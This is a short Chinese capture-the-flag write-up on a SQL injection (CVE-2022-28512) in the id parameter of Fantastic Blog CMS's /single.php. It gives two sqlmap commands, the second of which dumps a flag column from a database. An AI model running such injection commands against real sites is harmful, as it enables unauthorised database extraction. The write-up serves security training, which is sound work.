Fantastic Blog (CMS)是一个博客/文章网络内容管理系统。该CMS的/single.php路径下,id参数存在一个SQL注入漏洞
CVE-2022-28512
打开题目
按照漏洞描述在/single.php
路径的参数id存在sql注入漏洞,我们手动注入一下
可以发现测试成功,我们bp抓包并保存下来,然后使用sqlmap
1 | python sqlmap.py -l "./requests/1.txt" |
得到flag
1 | python sqlmap.py -l "./requests/1.txt" -D ctf -T flag -C flag --dump |